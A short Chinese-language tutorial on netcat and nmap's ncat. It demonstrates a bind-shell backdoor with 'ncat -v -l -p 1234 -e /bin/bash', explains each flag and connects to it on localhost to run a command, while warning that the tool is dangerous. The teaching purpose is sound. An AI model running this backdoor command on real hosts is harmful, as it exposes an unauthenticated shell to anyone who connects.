netcat 有一項功能具有危險性,所以netcat有所謂安全版本,
把這項功能去掉.一般標準安裝都是安裝安全版本.

較強大的版本,是在nmap套件裡面的.nmap是一組強悍的漏洞掃描
程式,包含nmap本身,以及較強的netcat,為了避免與一般的netcat
安裝的執行檔nc衝突,這版本的執行檔叫ncat.

Remote Shell / Backdoor

使用方式 ncat -v -l -p 1234 -e /bin/bash

-v 詳細模式
-l listen
-p 指定port
-e 執行程式, 這裡執行 BASH

來看範例:

終端機A

ncat -v -l -p 1234 -e /bin/bash
Ncat: Version 6.25 ( http://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234

終端機B使用一般natcat連接後
nc localhost 1234

終端機A出現,代表連接上了

Ncat: Connection from ::1.
Ncat: Connection from ::1:43786.

終端機B傳送date,由A的bash執行後回傳
date
Tue Oct 27 21:49:48 CST 2014

一個後門就這樣建立了.
這版本的Netcat具有一定的危險性.慎用!
Netcat也有Windows的版本.
本系列的介紹,是希望大家平日操作能夠有更多指令
可以靈活運用.
其餘Netcat一些較危險的操作方式,就不介紹了.